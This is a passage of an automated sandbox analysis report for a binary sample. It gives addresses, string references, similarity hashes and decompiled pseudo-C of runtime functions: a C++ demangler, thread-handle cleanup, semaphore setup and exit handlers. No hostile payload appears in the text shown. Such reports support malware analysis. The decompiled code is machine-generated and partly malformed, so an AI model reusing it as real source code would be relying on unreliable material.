0x0040bad0
0x0040bad3
0x0040bad9
0x00000000
0x00000000
0x0040badb
0x0040badb
0x0040bb22
0x0040bb22
0x0040bb2b
0x0040bb52
0x0040bb57
0x0040bb5a
0x0040bb2f
0x0040bb5c
0x0040bb62
0x0040bb69
0x0040bb6d
0x0040bb75
0x0040bb79
0x0040bb7c
0x0040bb82
0x0040bb87
0x0040bb89
0x0040bb90
0x0040bb90
0x0040bb32
0x0040bb3b
0x0040bb41
0x0040bb44
0x0040bb4a
0x0040b9b4
0x0040b9b4
0x0040b9b7
0x00000000
0x0040bb50
0x0040bb50
0x00000000
0x0040bb50
0x0040b9c2
0x0040b9ca
0x0040b9cf
0x0040b9dc
0x00000000
0x0040b9dc
0x0040bb52
0x0040b9ba
0x0040b9c0
0x00000000
0x00000000
0x00000000
0x0040b88a
0x0040b890
0x0040b895
0x00000000
0x0040b895
0x0040b888
0x0040b883
0x00000000
0x00000000
0x00000000
0x0040b85b
0x00000000
0x0040b843
0x0040b843
0x0040b849
0x00000000
0x0040b841
0x00000000
0x0040b83f
0x00000000

Strings

{default arg#, xrefs: 0040BA12
}::, xrefs: 0040BB26

Memory Dump Source

Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID:
String ID: {default arg#$}::
API String ID: 0-3706473490
Opcode ID: f6a5695efae2835f33b0a44589fd0ae4fef321bba4350e7326e33b460c672c70
Instruction ID: f4f608b1dceb6418645120ccea16dd4763757164fdb04872707e84549da8f2de
Opcode Fuzzy Hash: f6a5695efae2835f33b0a44589fd0ae4fef321bba4350e7326e33b460c672c70
Instruction Fuzzy Hash: 28A15370608741CBC725DF28C0847ABBBE1EF94304F14883EE5DA9B341D779A885DB9A

Uniqueness

Uniqueness Score: -1.00%

Function 004083F4 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E004083F4(signed int* __ebx, void* __ecx, void* __ebp, char* _a4, signed int _a8, signed int _a12, signed int _a16, char _a48) {
				signed int _t87;
				signed int _t90;
				signed int* _t93;
				unsigned int _t97;
				void* _t99;
				signed int _t100;
				signed int _t103;
				signed int* _t108;
				signed int _t112;
				signed int _t113;
				signed int _t118;
				signed int _t120;
				signed int _t122;
				signed int _t123;
				signed int* _t124;
				void* _t126;
				signed int _t127;
				signed int _t130;
				intOrPtr* _t132;
				char* _t134;
				char* _t136;
				signed char* _t138;
				void* _t141;
				signed int** _t142;

				_t108 = __ebx;
				_t130 = _a12;
				E0040B090(__ebx,  *((intOrPtr*)(__ecx + 4)), _t130);
				_t87 = __ebx[0x40];
				if((_t130 & 0x00000004) != 0) {
					if(_t87 == 0xff) {
						__ebx[0x3f] = 0;
						_a4 = 0xff;
						 *_t142 = __ebx;
						_a8 = __ebx[0x43];
						__ebx[0x42]();
						_t122 = 1;
						_t87 = 0;
						__ebx[0x48] = __ebx[0x48] + 1;
					} else {
						_t122 = _t87 + 1;
					}
					_t108[0x40] = _t122;
					 *((char*)(_t108 + _t87)) = 0x2e;
					_t108[0x41] = 0x2e;
					goto L11;
				} else {
					__esi = 0x41fa44;
					while(1) {
						__edx =  *__esi & 0x000000ff;
						if(__eax != 0xff) {
							__ecx = __eax + 1;
						} else {
							__eax =  *(__ebx + 0x10c);
							_a16 = __edx;
							 *((char*)(__ebx + 0xff)) = 0;
							_a4 = 0xff;
							_a8 =  *(__ebx + 0x10c);
							 *__esp = __ebx;
							__eax =  *((intOrPtr*)(__ebx + 0x108))();
							__ecx = 1;
							__eax = 0;
							 *((intOrPtr*)(__ebx + 0x120)) =  *((intOrPtr*)(__ebx + 0x120)) + 1;
							__edx = _a16;
						}
						__esi =  &(__esi[1]);
						 *(__ebx + 0x100) = __ecx;
						 *((char*)(__ebx + __eax)) = __dl;
						 *((char*)(__ebx + 0x104)) = __dl;
						if(__esi == 0x41fa46) {
							break;
						}
						__eax = __ecx;
					}
					L11:
					_t132 = _a8;
					if( *_t132 == 0x45) {
						_t90 = _t108[0x40];
						_t134 = "{default arg#";
						while(1) {
							_t123 =  *_t134 & 0x000000ff;
							if(_t90 != 0xff) {
								_t112 = _t90 + 1;
							} else {
								_a16 = _t123;
								_t108[0x3f] = 0;
								_a4 = 0xff;
								_a8 = _t108[0x43];
								 *_t142 = _t108;
								_t108[0x42]();
								_t112 = 1;
								_t90 = 0;
								_t108[0x48] = _t108[0x48] + 1;
								_t123 = _a16;
							}
							_t134 =  &(_t134[1]);
							_t108[0x40] = _t112;
							 *(_t108 + _t90) = _t123;
							_t108[0x41] = _t123;
							if(_t134 == 0x41fa54) {
								break;
							}
							_t90 = _t112;
						}
						_a4 = "%ld";
						_a8 =  *((intOrPtr*)(_t132 + 8)) + 1;
						_t93 =  &_a48;
						 *_t142 = _t93;
						_a16 = _t93;
						sprintf(??, ??);
						_t124 = _t93;
						do {
							_t113 =  *_t124;
							_t124 =  &(_t124[1]);
							_t97 = _t113 - 0x01010101 &  !_t113 & 0x80808080;
						} while (_t97 == 0);
						_t98 =  ==  ? _t97 >> 0x10 : _t97;
						_t125 =  ==  ?  &(_t124[0]) : _t124;
						_t99 = ( ==  ? _t97 >> 0x10 : _t97) + ( ==  ? _t97 >> 0x10 : _t97);
						asm("sbb edx, 0x3");
						_t126 = ( ==  ?  &(_t124[0]) : _t124) - _a16;
						if(_t126 == 0) {
							_t127 = _t108[0x40];
							L29:
							_t136 = "}::";
							while(1) {
								_t100 =  *_t136 & 0x000000ff;
								if(_t127 != 0xff) {
									_t118 = _t127 + 1;
								} else {
									_a16 = _t100;
									_t108[0x3f] = 0;
									_a4 = 0xff;
									_a8 = _t108[0x43];
									 *_t142 = _t108;
									_t108[0x42]();
									_t118 = 1;
									_t127 = 0;
									_t108[0x48] = _t108[0x48] + 1;
									_t100 = _a16;
								}
								_t136 =  &(_t136[1]);
								_t108[0x40] = _t118;
								 *(_t108 + _t127) = _t100;
								_t108[0x41] = _t100;
								if(_t136 == 0x41fa5c) {
									_t132 =  *((intOrPtr*)(_t132 + 4));
									goto L12;
								}
								_t127 = _t118;
							}
						}
						_t138 = _a16;
						_t103 = _t108[0x40];
						_t141 = _t126 + _t138;
						while(1) {
							_t120 =  *_t138 & 0x000000ff;
							if(_t103 != 0xff) {
								_t127 = _t103 + 1;
							} else {
								_a16 = _t120;
								_t108[0x3f] = 0;
								_a4 = 0xff;
								_a8 = _t108[0x43];
								 *_t142 = _t108;
								_t108[0x42]();
								_t127 = 1;
								_t103 = 0;
								_t108[0x48] = _t108[0x48] + 1;
								_t120 = _a16;
							}
							_t138 =  &(_t138[1]);
							_t108[0x40] = _t127;
							 *(_t108 + _t103) = _t120;
							_t108[0x41] = _t120;
							if(_t138 == _t141) {
								goto L29;
							}
							_t103 = _t127;
						}
					}
					L12:
					_t87 = E0040B090(_t108, _t132, _a12);
					return _t87;
				}
			}

0x004083f4
0x004083f4
0x004083ff
0x00408407
0x0040840d
0x004095a3
0x0040ab2b
0x0040ab32
0x0040ab3a
0x0040ab3d
0x0040ab41
0x0040ab47
0x0040ab4c
0x0040ab4e
0x004095a9
0x004095a9
0x004095a9
0x004095ac
0x004095b2
0x004095b6
0x00000000
0x00408413
0x00408413
0x00408443
0x00408448
0x0040844b
0x00408420
0x0040844d
0x0040844d
0x00408453
0x00408457
0x0040845e
0x00408466
0x0040846a
0x0040846d
0x00408473
0x00408478
0x0040847a
0x00408481
0x00408481
0x00408423
0x0040842c
0x00408432
0x00408435
0x0040843b
0x00000000
0x00000000
0x00408441
0x00408441
0x004095bd
0x004095bd
0x004095c3
0x0040a2e7
0x0040a2ed
0x0040a313
0x0040a318
0x0040a31b
0x0040a2f4
0x0040a31d
0x0040a323
0x0040a327
0x0040a32e
0x0040a336
0x0040a33a
0x0040a33d
0x0040a343
0x0040a348
0x0040a34a
0x0040a351
0x0040a351
0x0040a2f7
0x0040a300
0x0040a306
0x0040a309
0x0040a30f
0x00000000
0x00000000
0x0040a311
0x0040a311
0x0040a35a
0x0040a365
0x0040a369
0x0040a36f
0x0040a372
0x0040a376
0x0040a37b
0x0040a37d
0x0040a37d
0x0040a37f
0x0040a38c
0x0040a38c
0x0040a39d
0x0040a3a3
0x0040a3a6
0x0040a3a8
0x0040a3ab
0x0040a3af
0x0040a41f
0x0040a425
0x0040a425
0x0040a44f
0x0040a455
0x0040a458
0x0040a430
0x0040a45a
0x0040a460
0x0040a464
0x0040a46b
0x0040a473
0x0040a477
0x0040a47a
0x0040a480
0x0040a485
0x0040a487
0x0040a48e
0x0040a48e
0x0040a433
0x0040a43c
0x0040a442
0x0040a445
0x0040a44b
0x0040a494
0x00000000
0x0040a494
0x0040a44d
0x0040a44d
0x0040a44f
0x0040a3b1
0x0040a3b5
0x0040a3bb
0x0040a3db
0x0040a3e0
0x0040a3e3
0x0040a3c0
0x0040a3e5
0x0040a3eb
0x0040a3ef
0x0040a3f6
0x0040a3fe
0x0040a402
0x0040a405
0x0040a40b
0x0040a410
0x0040a412
0x0040a419
0x0040a419
0x0040a3c3
0x0040a3c8
0x0040a3ce
0x0040a3d1
0x0040a3d7
0x00000000
0x00000000
0x0040a3d9
0x0040a3d9
0x0040a3db
0x004095c9
0x004095d1
0x00407a6f
0x00407a6f

Strings

., xrefs: 004095B6
{default arg#, xrefs: 0040A2ED
}::, xrefs: 0040A425

Memory Dump Source

Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID:
String ID: .${default arg#$}::
API String ID: 0-723286900
Opcode ID: 807978e2fe12c8e62650436d5fac89316e3c74444dbfa66250aab1241fff8e95
Instruction ID: 111b32b15ac1d8639141e8955343ba3e421cf829549de16c4b54ac847c584bdd
Opcode Fuzzy Hash: 807978e2fe12c8e62650436d5fac89316e3c74444dbfa66250aab1241fff8e95
Instruction Fuzzy Hash: B4714E70508382CBC715CF18C0847A5BBE1AF95304F1889BEECC99F386D7B99889DB56

Uniqueness

Uniqueness Score: -1.00%

Function 004088F8 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

APIs

sprintf.MSVCRT ref: 00409E3C

Strings

this, xrefs: 00408909
}, xrefs: 00409F02
{parm#, xrefs: 00409DB7

Memory Dump Source

Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID: sprintf
String ID: this${parm#$}
API String ID: 590974362-3278767634
Opcode ID: 30e33bfbb701848d574accebed10949c52124b3b754f770995b392d252369856
Instruction ID: 6ca329e72789fd266b2bb598c5e7687cf637df336f52b9e7cc6e2d8447b8da5e
Opcode Fuzzy Hash: 30e33bfbb701848d574accebed10949c52124b3b754f770995b392d252369856
Instruction Fuzzy Hash: FC514A7050C2418BCB15CF28C0847A67BE1AF94310F0889BEECCD9F387D7B998859B96

Uniqueness

Uniqueness Score: -1.00%

Function 00412D80 Relevance: 6.1, APIs: 4, Instructions: 93
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 33%

			E00412D80(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
				void* _v16;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				char* _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t33;
				intOrPtr _t35;
				int _t36;
				void* _t37;
				intOrPtr _t38;
				intOrPtr _t44;
				signed int _t56;
				void* _t57;
				intOrPtr _t63;
				intOrPtr* _t66;
				intOrPtr* _t67;
				intOrPtr* _t68;

				_t57 = __ecx;
				_t63 = _a4;
				 *_t66 = _t63;
				_t33 = E004107C0(__edx);
				_v44 = 0;
				_v36 = 0xfeedbab1;
				_v40 = 0;
				_v32 = 1;
				_t56 = _t33;
				if(_t33 == 0) {
					L3:
					_t64 = 3;
					L4:
					return _t64;
				}
				_t35 =  *((intOrPtr*)(_t33 + 0x14));
				if(_t35 == 0) {
					goto L3;
				}
				_v72 =  &_v48;
				 *_t66 = _t35;
				_t36 = GetHandleInformation(??, ??);
				_t67 = _t66 - 8;
				if(_t36 != 0) {
					_t64 = 0x16;
					if(( *(_t56 + 0x24) & 0x00000004) == 0) {
						_t37 = E004102F0(_t56, _t57,  &_v48, _t63, 0x16);
						if(_t37 == 0) {
							_t38 = 0;
						} else {
							_t38 =  *((intOrPtr*)(_t37 + 0xbc));
						}
						_t64 = 0x24;
						if(_t63 != _t38) {
							E00412210();
							if( *((intOrPtr*)(_t56 + 0x70)) == 0) {
								_v72 = 0xffffffff;
								 *_t67 =  *((intOrPtr*)(_t56 + 0x14));
								WaitForSingleObject(??, ??);
								_t67 = _t67 - 8;
							}
							 *_t67 =  *((intOrPtr*)(_t56 + 0x14));
							CloseHandle(??);
							_t44 =  *((intOrPtr*)(_t56 + 0x18));
							_t68 = _t67 - 4;
							if(_t44 != 0) {
								 *_t68 = _t44;
								CloseHandle(??);
								_t68 = _t68 - 4;
							}
							 *((intOrPtr*)(_t56 + 0x18)) = 0;
							if(_a8 != 0) {
								 *_a8 =  *((intOrPtr*)(_t56 + 4));
							}
							_t64 = 0;
							 *_t68 = _t56 + 0x1c;
							E004140E0();
							 *((intOrPtr*)(_t56 + 0x34)) = _v44;
							 *((intOrPtr*)(_t56 + 0x38)) = _v40;
							 *((intOrPtr*)(_t56 + 0x3c)) = _v36;
							 *((intOrPtr*)(_t56 + 0x40)) = _v32;
							if( *((intOrPtr*)(_t56 + 0xb8)) == 0) {
								E0040FD20(_t56);
							}
						}
					}
					goto L4;
				}
				goto L3;
			}

0x00412d80
0x00412d89
0x00412d8c
0x00412d8f
0x00412d94
0x00412d9b
0x00412da2
0x00412da9
0x00412db2
0x00412db4
0x00412dd4
0x00412dd4
0x00412dd9
0x00412de2
0x00412de2
0x00412db6
0x00412dbb
0x00000000
0x00000000
0x00412dc0
0x00412dc4
0x00412dc7
0x00412dcd
0x00412dd2
0x00412de7
0x00412dec
0x00412dee
0x00412df5
0x00412e8b
0x00412dfb
0x00412dfb
0x00412dfb
0x00412e03
0x00412e08
0x00412e0a
0x00412e14
0x00412e95
0x00412ea0
0x00412ea3
0x00412ea9
0x00412ea9
0x00412e1f
0x00412e22
0x00412e24
0x00412e27
0x00412e2c
0x00412e2e
0x00412e31
0x00412e33
0x00412e33
0x00412e39
0x00412e42
0x00412e4a
0x00412e4a
0x00412e4f
0x00412e51
0x00412e54
0x00412e5c
0x00412e62
0x00412e68
0x00412e6e
0x00412e79
0x00412e81
0x00412e81
0x00412e79
0x00412e08
0x00000000
0x00412dec
0x00000000

APIs

GetHandleInformation.KERNEL32 ref: 00412DC7
CloseHandle.KERNEL32 ref: 00412E22
CloseHandle.KERNEL32 ref: 00412E31
WaitForSingleObject.KERNEL32 ref: 00412EA3

Memory Dump Source

Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID: Handle$Close$InformationObjectSingleWait
String ID:
API String ID: 135186658-0
Opcode ID: e5a4b129ae92d8d88fee5e4004c5104fc19af652de718fde7cfc4be735879905
Instruction ID: eefc78a76a067577111aecbaeb0e7de47b452a34a27c7b211ac7547dace962ae
Opcode Fuzzy Hash: e5a4b129ae92d8d88fee5e4004c5104fc19af652de718fde7cfc4be735879905
Instruction Fuzzy Hash: B8312A74A003088BDB50EF69D6847DABBF4EF08310F04856AEC45EB345E779E895CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00413A00 Relevance: 6.1, APIs: 4, Instructions: 76threadCOMMON

Download Yara Rule

APIs

ReleaseSemaphore.KERNEL32(?,?,?,?,FFFFFFFF,?,0040FB75), ref: 00413A4C
GetCurrentThreadId.KERNEL32 ref: 00413A77
GetCurrentThreadId.KERNEL32 ref: 00413AA4

Memory Dump Source

Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID: CurrentThread$ReleaseSemaphore
String ID:
API String ID: 1483290962-0
Opcode ID: 843eff9c7fa453a6a21d8273f9d8158aafe4b9fad93c285ff7858f719f287fa3
Instruction ID: 6b0b4afb1b3186992077eecdeaba32eded2b69c28accb2d6c45d86a2178ee7f6
Opcode Fuzzy Hash: 843eff9c7fa453a6a21d8273f9d8158aafe4b9fad93c285ff7858f719f287fa3
Instruction Fuzzy Hash: CA2171357006058BDB20DF69D98439BB7B4EF40396F14843AD88687344E735EA86CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00415130 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

calloc.MSVCRT ref: 0041515D
free.MSVCRT(?,?,?,FFFFFFFF,?,004152D5), ref: 004151EB
free.MSVCRT(?,?,?,FFFFFFFF,?,004152D5), ref: 0041520F

Part of subcall function 00416080: calloc.MSVCRT ref: 004160BA
Part of subcall function 00416080: CreateSemaphoreA.KERNEL32 ref: 0041610E
Part of subcall function 00416080: CreateSemaphoreA.KERNEL32 ref: 00416135
Part of subcall function 00416080: InitializeCriticalSection.KERNEL32 ref: 00416154
Part of subcall function 00416080: InitializeCriticalSection.KERNEL32 ref: 0041615F
Part of subcall function 00416080: InitializeCriticalSection.KERNEL32 ref: 0041616A

Strings

, xrefs: 0041514E

Memory Dump Source

Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID: CriticalInitializeSection$CreateSemaphorecallocfree
String ID:
API String ID: 1811228352-3916222277
Opcode ID: 06ab00d90bc0c1de9f3d0d47dfa7f8a1f794360472c3a7af2a8bae076d9c70e2
Instruction ID: 4128b646aaba891ada79dfd1a06888151aadab1d0cf51ac5d6bc289caab5bcc4
Opcode Fuzzy Hash: 06ab00d90bc0c1de9f3d0d47dfa7f8a1f794360472c3a7af2a8bae076d9c70e2
Instruction Fuzzy Hash: BC217FB16047049FD710AF26D48039BBBE4EF84358F458C6EE9888B342E77DC994CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00413AF0 Relevance: 6.1, APIs: 4, Instructions: 67COMMON

Download Yara Rule

APIs

calloc.MSVCRT ref: 00413B1F
CreateSemaphoreA.KERNEL32 ref: 00413B74

Memory Dump Source

Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID: CreateSemaphorecalloc
String ID:
API String ID: 194818478-0
Opcode ID: be592ff54935ea022d8ad1b5f88709ccb93884ab102ce677d5da886c338de866
Instruction ID: 00fe0f0be2da5e732bebc1b04f87b074566867ad18d38b5108f8291d3f12238d
Opcode Fuzzy Hash: be592ff54935ea022d8ad1b5f88709ccb93884ab102ce677d5da886c338de866
Instruction Fuzzy Hash: A121DA71604305DFEB109F59C48438ABBE4EF40369F14886AED58CB386FB78D984CB95

Uniqueness

Uniqueness Score: -1.00%

Function 004138D0 Relevance: 6.1, APIs: 4, Instructions: 59threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00413912
printf.MSVCRT ref: 00413965
GetCurrentThreadId.KERNEL32 ref: 00413973
printf.MSVCRT ref: 00413996

Memory Dump Source

Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID: CurrentThreadprintf
String ID:
API String ID: 2356641437-0
Opcode ID: 57ee4d070de15427d656353f7a16ca92c078416b7c61adaa258012ce0576d536
Instruction ID: 611bf596c6e15f060a768f0ba072d44477f6cdd3d242876fe9a2c858f071f05c
Opcode Fuzzy Hash: 57ee4d070de15427d656353f7a16ca92c078416b7c61adaa258012ce0576d536
Instruction Fuzzy Hash: AB2168B8A093009F8344DF1AD58481AFBE5FF89760F55896EF88897321D374E941CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040CB20 Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

_lock.MSVCRT ref: 0040CB45
__dllonexit.MSVCRT ref: 0040CB83
_unlock.MSVCRT ref: 0040CBB3
_onexit.MSVCRT ref: 0040CBC7

Memory Dump Source

Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID: __dllonexit_lock_onexit_unlock
String ID:
API String ID: 209411981-0
Opcode ID: 8b1b58f89a79551562e3bfa36572f0ebcdc3d5ed823508bc3b8ba4bd712296a5
Instruction ID: da490afd404eaf5b5c0649b7776465ff8fabc6fec02763ed850c7dc601e45c55
Opcode Fuzzy Hash: 8b1b58f89a79551562e3bfa36572f0ebcdc3d5ed823508bc3b8ba4bd712296a5
Instruction Fuzzy Hash: AF11A2B0A08301CBD700FF75E4C561EBBE0AB48344F904E3EF8D497391E67895888B8A

Uniqueness

Uniqueness Score: -1.00%

Function 00415DD0 Relevance: 6.0, APIs: 4, Instructions: 46threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00415DF3
fprintf.MSVCRT ref: 00415E2F
GetCurrentThreadId.KERNEL32 ref: 00415E40
fprintf.MSVCRT ref: 00415E68

Memory Dump Source

Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
